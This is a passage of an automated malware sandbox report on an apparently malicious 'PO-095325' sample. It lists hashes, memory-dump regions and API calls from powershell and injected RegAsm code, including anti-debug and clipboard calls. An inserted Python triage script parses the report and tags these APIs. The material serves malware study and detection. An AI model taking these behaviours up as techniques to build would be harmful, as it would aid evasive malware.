• Opcode ID: f1ac0d23a8168c0f5e9649772bbda4ab16794e870bf78e5ce90ea82f32f74f34
• Instruction ID: 5d6e6397371832daea12556f6094a6b3f6134c88a29ad868758dad203f53087c
• Opcode Fuzzy Hash: f1ac0d23a8168c0f5e9649772bbda4ab16794e870bf78e5ce90ea82f32f74f34
• Instruction Fuzzy Hash: E71146B5C003498BDB20DFAAC4457EFFBF4EB89314F24841AD519A7240CB39A941CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 785bd8bcc0b149a4e32d09339a020914ed167c9776fc5338b0cf808d431e1d52
• Instruction ID: 605c3094a50c49d1c670fc72d9fdfe55bc9dc4c26b69a6367d8e0ba00aa55c9b
• Opcode Fuzzy Hash: 785bd8bcc0b149a4e32d09339a020914ed167c9776fc5338b0cf808d431e1d52
• Instruction Fuzzy Hash: BB1125B1D002488BDB20DFAAC4457EFFBF5EF89324F20841AD559A7240CB79A945CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 028AA77E
Memory Dump Source
• Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 9cc334f65a9940187406720f614dd779bdf61a502bcfa1783bc2733039bb636c
• Instruction ID: dc1242dc931993d21cc3afbd55fedaa75dc8644d28949cc376d0083f897d63f2
• Opcode Fuzzy Hash: 9cc334f65a9940187406720f614dd779bdf61a502bcfa1783bc2733039bb636c
• Instruction Fuzzy Hash: 27110FB9C003498FDB14CF9AC444A9FFBF9EB88314F10841AD458A7610C379A545CFA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2028808805.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c4d000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1cf2bf974e96b60e81e568d959c03dae0e877d5ca76db5dca38b3295072d4dca
• Instruction ID: 398ac899c017a30acb466511c6c3a098c96000bda043356d2fe0f93e3d0baa32
• Opcode Fuzzy Hash: 1cf2bf974e96b60e81e568d959c03dae0e877d5ca76db5dca38b3295072d4dca
• Instruction Fuzzy Hash: 2621F271604204DFCB14EF24D9C4B26BF65FB88314F20C5ADE90A4B396C33AD807CA62
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2028808805.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c4d000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d2347db983d0358d218332e93c8b3f4ada9b4d6f30794ebeaffd5d9303e8d92
• Instruction ID: d2cf42a773e9eca5b6db2191da05cd10523f1bd35548061617092bad6cbbb160
• Opcode Fuzzy Hash: 1d2347db983d0358d218332e93c8b3f4ada9b4d6f30794ebeaffd5d9303e8d92
• Instruction Fuzzy Hash: 73218E755093808FCB02DF24D994715BF71FB46314F28C5EAD8898B2A7C33A980ACB62
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 665664bcaad16bad497ae971f2f73ea5e70d46db2733aad62ec7469ff3838944
• Instruction ID: e6cf79ae17233a5aa410c516a1330202b4da8d2ed9e998b9afd28b0f2210d614
• Opcode Fuzzy Hash: 665664bcaad16bad497ae971f2f73ea5e70d46db2733aad62ec7469ff3838944
• Instruction Fuzzy Hash: D01296B8C817458AEB10CF25E84C1893BB1B751718FF04A29D2617B6E5DBBC35AACF44
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee068dad75d2596ae86c0e7200278edf2bc77d3aee0f53e2f08b20b2237116fe
• Instruction ID: f58235e782d26eb4529e232d4b802edddcfb1ab348809f0e90fe5c6ae69a46a2
• Opcode Fuzzy Hash: ee068dad75d2596ae86c0e7200278edf2bc77d3aee0f53e2f08b20b2237116fe
• Instruction Fuzzy Hash: 91A16C3AE002198FDF15DFA8C89059EB7B2FF85305B15897AE806EB261DF31E915CB50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00cd20fc4240a0560a735aa1718047ad2b3a50c67d5a8c76ccfa09b40b625309
• Instruction ID: 590885c7f3619123546c1a85faecf94472cf41007d40a6a418ce912b22711a70
• Opcode Fuzzy Hash: 00cd20fc4240a0560a735aa1718047ad2b3a50c67d5a8c76ccfa09b40b625309
• Instruction Fuzzy Hash: 77C10AB8C817458BEB10CF25E8481897BB1FB95314FB04A29D2617B2D4DBBC35AACF44
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 14896fccc00d00aceeea70ff1c63f5880459c6e743c8820f14a3ee271fec7ad6
• Instruction ID: 9548faec2b0096a598defb5980edac26e0e6536dfcc4f20a906024a953968363
• Opcode Fuzzy Hash: 14896fccc00d00aceeea70ff1c63f5880459c6e743c8820f14a3ee271fec7ad6
• Instruction Fuzzy Hash: 041121D37E9192CBF3D2387699E70C72762C2A109238AD435CCA94A507581E311FFD32
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8d589c3f732e0bb04b76d2aeedeb2f8d23c83b08e0e2424b85d48e46f3dab722
• Instruction ID: 70e77b0171f2d6374e062c26cc7fd536edc84dc95d8ec7693f60e5dc0baf4308
• Opcode Fuzzy Hash: 8d589c3f732e0bb04b76d2aeedeb2f8d23c83b08e0e2424b85d48e46f3dab722
• Instruction Fuzzy Hash: BE3177B5D016288FEB28CF57C9153DAFAF2AF85305F04C1EAC54CAA254DB750A89CF91
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$4']q$4']q
• API String ID: 0-1785108022
• Opcode ID: c787f9648ece14c70c108466187b3b60f653aa5fb429c4f065ada8c4f10de073
• Instruction ID: 2cf6b7ce50a3216f0ac3221454857db338e67abd2166e7f33e6f1442bc78ca9e
• Opcode Fuzzy Hash: c787f9648ece14c70c108466187b3b60f653aa5fb429c4f065ada8c4f10de073
• Instruction Fuzzy Hash: 891223B170831D8FCB55AA6C88107EFBBA2AFC6314F14846BD605CB791CB31C986C7A1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 563c2ad544edcb29f18449f094ce1a29163c3ab3df8fa75c8ee92971b2214c9c
• Instruction ID: d288264e7fe1167fe541ba2358e6b610e4538e0c35155fbc326a722672357d09
• Opcode Fuzzy Hash: 563c2ad544edcb29f18449f094ce1a29163c3ab3df8fa75c8ee92971b2214c9c
• Instruction Fuzzy Hash: E3918C70A002058FCB15DF58C5D8AAEFBF5FF48310B258569D816AB365C735EC41CBA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a73fc280da07e04e40238306dcf40811c44ee331aab980000473230797ec698f
• Instruction ID: 1d8de7301c083048fe3db537cc66706abb9fb47e50f04237cbe678699dee0d71
• Opcode Fuzzy Hash: a73fc280da07e04e40238306dcf40811c44ee331aab980000473230797ec698f
• Instruction Fuzzy Hash: 8241E2F1A0820DCFCB51AB198540BFE7BE2AF46204F1884AFD8149F751C736D986C7A1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c518f9b1d027a10ab0ebfa30001454fc206c2bcfe632ea8d404122b4c41ceebe
• Instruction ID: 80219cf1298dcbed7c82cac79465e5a0c3537b0a68e53054ca8d147bc9a9956f
• Opcode Fuzzy Hash: c518f9b1d027a10ab0ebfa30001454fc206c2bcfe632ea8d404122b4c41ceebe
• Instruction Fuzzy Hash: 5C41BF70A0A3868FC706DB6CD89459ABFB0FF5634070940DAD485DB393C725EC0ACBA2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95ade8ed335a2409af6cb496a65dda9919b84a14b75bdb8dccbcb8f308f5ea64
                                                                        • Instruction ID: 3626708f769e99730800c6d4ed657cc0e5d02a340af9d4e1dd5d509dd1761cf6
                                                                        • Opcode Fuzzy Hash: 95ade8ed335a2409af6cb496a65dda9919b84a14b75bdb8dccbcb8f308f5ea64
                                                                        • Instruction Fuzzy Hash: C6413974A005059FCB09DF58C5D8AAAFBB6FF48314B158159D81AAB364C736FC91CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ad2df525d183895a0c01ae885d482bf2e8a3e659e0fa4d395983bf52d283c60
                                                                        • Instruction ID: eddd3742a0bc1860d5d0f14be7231339e3c6c138d6383eea0cf89681bfdf7cea
                                                                        • Opcode Fuzzy Hash: 4ad2df525d183895a0c01ae885d482bf2e8a3e659e0fa4d395983bf52d283c60
                                                                        • Instruction Fuzzy Hash: F5210874A056499FCB04DFACD5809AABBB1FF89310B15859AD806EB362C731EC45CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe66c0ef8b0dfb6ade9d492effc0d3dc1022fc7fb09cd1d390f82c5c77f106c2
                                                                        • Instruction ID: fff912c458f1bf787e496101861f93f37c552a66a279b96636b4723f5d16db2a
                                                                        • Opcode Fuzzy Hash: fe66c0ef8b0dfb6ade9d492effc0d3dc1022fc7fb09cd1d390f82c5c77f106c2
                                                                        • Instruction Fuzzy Hash: EA21FC74A046099FCB05DFA8C4909AABBF1FF49310B158595D40AEB361C731EC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72ebf075f064d7ae570b451fd545425e87f338b259ef23f5dc7389328728d8ff
                                                                        • Instruction ID: a25e30156c7322fcb53158e37fd50db6f051dc8676c7074b7c62cd879ebe89a3
                                                                        • Opcode Fuzzy Hash: 72ebf075f064d7ae570b451fd545425e87f338b259ef23f5dc7389328728d8ff
                                                                        • Instruction Fuzzy Hash: D4118034B01644CFCB04DFACD590AAABBB1FF89310B05849AC846EB362C735AC05CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2046398766.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2bbd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df0c8ad1b3047d67221440dbaa22d21ad51cddf9a0e91b04435ec861e1b36910
                                                                        • Instruction ID: 12db6380fe291ad4b957b4b7bf40b3a6adc0b0bba4395c42f74747337d394a9d
                                                                        • Opcode Fuzzy Hash: df0c8ad1b3047d67221440dbaa22d21ad51cddf9a0e91b04435ec861e1b36910
                                                                        • Instruction Fuzzy Hash: B6012631105301DEE7218A2ACD84BB7FF9CEF46324F18C4AAED480B246C3BD9841CAB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2046398766.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2bbd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec79b88c585ba8d803217de8cf8003490708d6d67cf97f509937bba7ae6b1bff
                                                                        • Instruction ID: 8158bab0ae4fe6164b92377f4df32a969f36f02d123c69face84f5571313499e
                                                                        • Opcode Fuzzy Hash: ec79b88c585ba8d803217de8cf8003490708d6d67cf97f509937bba7ae6b1bff
                                                                        • Instruction Fuzzy Hash: 9001527250E3C09ED7128B258894762BFB4EF53224F19C0DBD9888F197C2695844C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: 011dc50c7c5b51002a3f3569a03bd95deb21d10dc6764946b0079c3c7e897e11
                                                                        • Instruction ID: acbd25d9ba04e2f54a2e7e92b3129371b68ce64c064bc54a62b83d800771a26d
                                                                        • Opcode Fuzzy Hash: 011dc50c7c5b51002a3f3569a03bd95deb21d10dc6764946b0079c3c7e897e11
                                                                        • Instruction Fuzzy Hash: 8FF122B2B0421D8FCB55AA6C94006EFBBE6EF85720F18846FD845CB750DB31C846CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: c8cadbfddd0ae1e8f8dc64f6c02dddd9bbfeffdc81ad1014c89d050a7ae092c2
                                                                        • Instruction ID: fc6d35acb9760d9b66045136b22dec498bbd29dc4294d0121b0ba2645a4d9b36
                                                                        • Opcode Fuzzy Hash: c8cadbfddd0ae1e8f8dc64f6c02dddd9bbfeffdc81ad1014c89d050a7ae092c2
                                                                        • Instruction Fuzzy Hash: 5DA147B27243598FC765AA6C94106BFBBE5EFC2710F19846BD845CB361CA31C84AC7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: f4b8dbd9f1912c364c199e9c4e94dad5624a1083005f09fab3b62e65ed30e724
                                                                        • Instruction ID: 508250d8bc4e3b634b31fec8c8c643b42afc26334b0d53a756b44f8dad8f9a60
                                                                        • Opcode Fuzzy Hash: f4b8dbd9f1912c364c199e9c4e94dad5624a1083005f09fab3b62e65ed30e724
                                                                        • Instruction Fuzzy Hash: 262127B171430AABD7647D2E9850BAFBBDA9FC5F15F24882BD905CB381DE36C8418361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2054244020.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7480000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-978391646
                                                                        • Opcode ID: c3363ca8076dfb86c761db61923962d9cbbf9afbc75320542922d5973f6dab57
                                                                        • Instruction ID: a5aab029bcb11be7dd9db83302526f338a3af7677173d846343b321e10626ced
                                                                        • Opcode Fuzzy Hash: c3363ca8076dfb86c761db61923962d9cbbf9afbc75320542922d5973f6dab57
                                                                        • Instruction Fuzzy Hash: 0501F26171D3994FC33B226C55201AA2FB25F8395071A45D3C0C0CF3A7C9148C0D87B7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:12.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:1.6%
                                                                        Total number of Nodes:192
                                                                        Total number of Limit Nodes:19
                                                                        execution_graph (interactive node/edge rendering; the raw node list is not reproduced here). API call sites that appear as graph nodes, with their addresses: OleInitialize (160ec90), CheckRemoteDebuggerPresent (1607f14), KiUserCallbackDispatcher (160e3c8, 160e409), CallWindowProcW (160e12a), OleGetClipboard (160edd8), DuplicateHandle (6e6f8d0), GetModuleHandleW (6e6b654, 6e6cd70), CreateWindowExW (6e6ddcd, 6e6de05).
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 01607F47
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: b2aa16e3686359f2bf739888f6b7bdd88469537865de9174ff8e99576c9a351c
                                                                        • Instruction ID: 48829f2b3e2c44156231068d1d21f55cbbcdc8524a5b59978234c2d2556be789
                                                                        • Opcode Fuzzy Hash: b2aa16e3686359f2bf739888f6b7bdd88469537865de9174ff8e99576c9a351c
                                                                        • Instruction Fuzzy Hash: 4A2145B18002598FDB14CF9AD884BEEFBF4EF49320F14846AE458A3350C778A944CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
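
The "APIs" and "Memory Dump Source" blocks above follow a fixed layout: API name, module, placeholder arguments and call-site address, then the .sdmp file name whose dot-separated fields carry the analysis process index, the region base and its page protection, and whether the region was backed by a PE image. The following Python script is an added triage example, not part of the Joe Sandbox report or its tooling: it parses that layout, decodes the protection field with the documented PAGE_* constants, and lists which unbacked RWX regions contain functions that call APIs an analyst would tag as anti-debug, clipboard capture or window creation. The API-to-tag map and the reading of the first .sdmp field as the analysis process index are assumptions; the sample text is copied from blocks on this page.

```python
"""Triage helper for the "APIs" / "Memory Dump Source" blocks of a Joe Sandbox report.

Added example for this page; it is not Joe Sandbox code. It reads the text
layout shown in the report and summarises, per dumped memory region, which
Win32 APIs the disassembled functions call and whether the region is an
unbacked RWX allocation (the usual shape of injected or unpacked code).
"""
import re

# Documented Win32 page-protection constants (fifth field of the .sdmp name).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Analyst-chosen behaviour tags (assumption, not a Joe Sandbox taxonomy).
API_TAGS = {
    "CheckRemoteDebuggerPresent": "anti-debug",
    "IsDebuggerPresent": "anti-debug",
    "OleGetClipboard": "clipboard-capture",
    "CreateWindowExW": "window-creation",
    "DuplicateHandle": "handle-duplication",
}

# Constructed sample: three blocks copied from this report in its own layout.
SAMPLE_REPORT = """\
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 01607F47
Memory Dump Source
• Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E6DF2A
Memory Dump Source
• Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.2047219047.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2de0000_powershell.jbxd
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File:\s*((?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp,"
                    r"\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
SNAP_RE = re.compile(r"Snapshot File:\s*hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_([^.\s]+)\.jbxd")


def parse_blocks(text):
    """Split the report text into blocks separated by blank lines."""
    return [b for b in re.split(r"\n\s*\n", text) if b.strip()]


def triage(text):
    """Return {(process_name, region_base): summary} for every dump block."""
    regions = {}
    for block in parse_blocks(text):
        src, snap = SRC_RE.search(block), SNAP_RE.search(block)
        if not src or not snap:
            continue  # not a memory-dump block
        fields = src.group(1).split(".")
        protect = int(fields[4], 16)
        key = (snap.group(4), src.group(2).upper())
        entry = regions.setdefault(key, {
            # Assumption: first field == analysis process index (matches the
            # first number in the hcaresult_* snapshot name).
            "process_index": int(fields[0], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "unbacked": src.group(3) == "false",  # not mapped from a PE image
            "apis": [],
            "tags": set(),
        })
        for name, module, _args, ref in API_RE.findall(block):
            entry["apis"].append((name, module, ref.upper()))
            if name in API_TAGS:
                entry["tags"].add(API_TAGS[name])
    return regions


def suspicious_regions(regions):
    """Unbacked RWX regions whose functions call at least one tagged API."""
    return sorted(k for k, v in regions.items()
                  if v["unbacked"] and v["protect"] == "PAGE_EXECUTE_READWRITE" and v["tags"])


if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for (proc, base), info in sorted(result.items()):
        print(f"{proc} #{info['process_index']} @ {base}: {info['protect']}, "
              f"unbacked={info['unbacked']}, apis={[a[0] for a in info['apis']]}, "
              f"tags={sorted(info['tags'])}")
    print("suspicious:", suspicious_regions(result))
```

On the sample, both RegAsm regions come out as unbacked PAGE_EXECUTE_READWRITE allocations with tagged API calls (anti-debug at 0x1600000, window creation at 0x6E60000), while the powershell region at 0x2DE0000 has no API calls in its block and is not flagged; the same script applied to the full report gives a per-region view of where the injected payload's anti-analysis and capture code lives.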

                                                                        Control-flow Graph

                                                                        control_flow_graph for 6e6ddcd–6e6df89 (interactive rendering with executed/not-executed colouring; the raw block list is not reproduced here). Basic blocks run from 6e6ddcd to 6e6df89; the 6e6ddd1–6e6ddf8 block calls 6e6b764, the 6e6de9b–6e6df3a block calls CreateWindowExW, and the final 6e6df89 block branches to itself.
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe6c79e33e824cb2c2462ba831de04e376bae9d453e2660d3d83baadb9b8178c
                                                                        • Instruction ID: 120493723a756e62cb04cfcec0fe8df8f51c294ae0d1d5795381a1f1c4df8365
                                                                        • Opcode Fuzzy Hash: fe6c79e33e824cb2c2462ba831de04e376bae9d453e2660d3d83baadb9b8178c
                                                                        • Instruction Fuzzy Hash: FF51FEB1D00349AFDB11CFAAC884ADDBFB5BF49314F64816AE818AB220D7719855CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph for 6e6de0c–6e6df89 (interactive rendering with executed/not-executed colouring; the raw block list is not reproduced here). Basic blocks run from 6e6de0c to 6e6df89; the 6e6dedb–6e6df3a block calls CreateWindowExW, and the final 6e6df89 block branches to itself.
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E6DF2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 168de62990f85e76f9a02663837b14f888680d134a69c9fbd421ea923abacd3d
                                                                        • Instruction ID: 3edb56aa0d2f5e68b83cb08f4b80b8aebe2f16c02871f6d0e7c48506fef5818d
                                                                        • Opcode Fuzzy Hash: 168de62990f85e76f9a02663837b14f888680d134a69c9fbd421ea923abacd3d
                                                                        • Instruction Fuzzy Hash: 4751D0B1D00309AFDB14CF9AD884ADEFBB5BF48314F64852AE418AB210D7749885CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

